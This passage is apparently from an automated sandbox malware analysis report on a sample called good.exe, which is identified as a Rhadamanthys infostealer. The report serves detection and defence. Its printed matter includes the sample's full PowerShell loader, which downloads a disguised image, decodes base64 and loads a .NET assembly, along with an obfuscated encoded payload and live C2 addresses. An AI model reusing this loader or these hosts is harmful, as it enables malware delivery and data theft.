ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J
                    Sigma detected: Script Interpreter Execution From Suspicious Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c fwr.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7520, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" , ProcessId: 7592, ProcessName: wscript.exe
                    Sigma detected: Suspicious Script Execution From Temp Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c fwr.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7520, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" , ProcessId: 7592, ProcessName: wscript.exe
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c fwr.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7520, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" , ProcessId: 7592, ProcessName: wscript.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\good.exe, ProcessId: 7492, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
                    Sigma detected: Usage Of Web Request Commands And Cmdlets
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?517613', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.chAFAmk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?517613', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c fwr.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7520, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs" , ProcessId: 7592, ProcessName: wscript.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@1@DE@Nw@2@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J

                    Data Obfuscation

                    barindex
                    Sigma detected: Powershell download and load assembly
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?517613', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.chAFAmk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?517613', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-20T15:48:50.614088+010020576351A Network Trojan was detected62.60.226.6480192.168.2.449739TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-20T15:49:13.952121+010020490381A Network Trojan was detected54.231.134.241443192.168.2.449738TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: powershell.exe.8112.10.memstrminMalware Configuration Extractor: Rhadamanthys {"C2 url": "https://66.63.187.37:3606/59da4dae6feed0c3/o8xvdk37.s0kh1"}
                    Multi AV Scanner detection for submitted file
                    Source: good.exeReversingLabs: Detection: 18%
                    Source: good.exeVirustotal: Detection: 22%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF7319130EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF7319130EC
                    Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.4:49737 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 54.231.134.241:443 -> 192.168.2.4:49738 version: TLS 1.2
                    Source: good.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Source: Binary string: wextract.pdb source: good.exe
                    Source: Binary string: wextract.pdbGCTL source: good.exe
                    Source: Binary string: wkernel32.pdb source: fontdrvhost.exe, 0000000C.00000003.2007870873.0000000005240000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2007716394.0000000005120000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdb source: fontdrvhost.exe, 0000000C.00000003.2008104480.0000000005120000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2008517695.0000000005340000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdb source: fontdrvhost.exe, 0000000C.00000003.2005726658.0000000005310000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2005425038.0000000005120000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: fontdrvhost.exe, 0000000C.00000003.2006376240.0000000005120000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2007391915.00000000052C0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdbUGP source: fontdrvhost.exe, 0000000C.00000003.2005726658.0000000005310000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2005425038.0000000005120000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: fontdrvhost.exe, 0000000C.00000003.2006376240.0000000005120000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2007391915.00000000052C0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdbUGP source: fontdrvhost.exe, 0000000C.00000003.2008104480.0000000005120000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2008517695.0000000005340000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernel32.pdbUGP source: fontdrvhost.exe, 0000000C.00000003.2007870873.0000000005240000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000000C.00000003.2007716394.0000000005120000.00000004.00000001.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\good.exeCode function: 0_2_00007FF73191204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF73191204C

                    Software Vulnerabilities

                    barindex
                    Suspicious execution chain found
                    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 62.60.226.64:80 -> 192.168.2.4:49739
                    Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 54.231.134.241:443 -> 192.168.2.4:49738
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: https://66.63.187.37:3606/59da4dae6feed0c3/o8xvdk37.s0kh1
                    Source: global trafficHTTP traffic detected: GET /dfghd/fgd/downloads/test.jpg?517613 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /a613a3a7-960e-457b-ade9-adac2ded05f8/downloads/13e6a3ab-36e2-4926-afc8-122cd28abbda/test.jpg?response-content-disposition=attachment%3B%20filename%3D%22test.jpg%22&AWSAccessKeyId=ASIA6KOSE3BNBTKKJY5M&Signature=WrRRG%2FjNv0KYJyVNvKxc%2BY6fR%2B0%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEK%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIHqlgISaXQZNWVdHrtqHFQM1aKdCCC5wz47mj8NtMH%2BIAiBdtBjgyJZ6tj7uXWFGVxbXJfoLZTyvi2A7sXwcgSrL%2BSqwAgio%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMFJaKkm%2Baexgdux4uKoQC6KXHopDQ%2FlrvHmoVWqroq7CEf10111jAHgCJB1MtIiwoslQvWwr%2B0TjbV0drvIlTQrZSoCEisB3EKyeKiSOdy4cG7zLV8sUpkCTFObt0YVdcZihx5WCNnElUd6Q0GtOsyOJ54uKNitBk4qLGC%2F8FLxoWB8Zd7GFtIhjBH6oiR29zWtJHxVJMEzbEk0X8I6ra5TJTAxAmj%2FGBrJRWzhpL7djvH%2BWsC9IJL3xndZ130rjzzEn3Hy0dMH4Ffr76tlD%2FuZUeGrYyghPc8SyR5fqjbJHN3e9nSOiKDWOIXmDqOsRdlmX0FjNbG66IlTsda3suu%2BoRn1c7bGtYzOEXJO6jQojgYsEwsMC5vAY6ngHasjGz4hS4AfIgJXweXhdRz1bV7MycPu%2FtoygR37IQAI2SIbv%2BJt7FUa41kbstbCnTf83poZhHfI9%2FRbWfaSYmj1qK922%2BqxSm9MABVAMkZx5JZm3rwCcg5wX1F4OziYeFQ62%2FCrMOCBR0WPCJ7vRvmPaibga1Dr8iVpJAsA4gu4VzYUGceXMrIg71s6AQv9mhMr9BdNeEyZjX7FjkwQ%3D%3D&Expires=1737385784 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /public_files/kmAFAhc.txt HTTP/1.1Host: 62.60.226.64Connection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 185.166.143.48 185.166.143.48
                    Source: Joe Sandbox ViewASN Name: ASLINE-AS-APASLINELIMITEDHK ASLINE-AS-APASLINELIMITEDHK
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.60.226.64
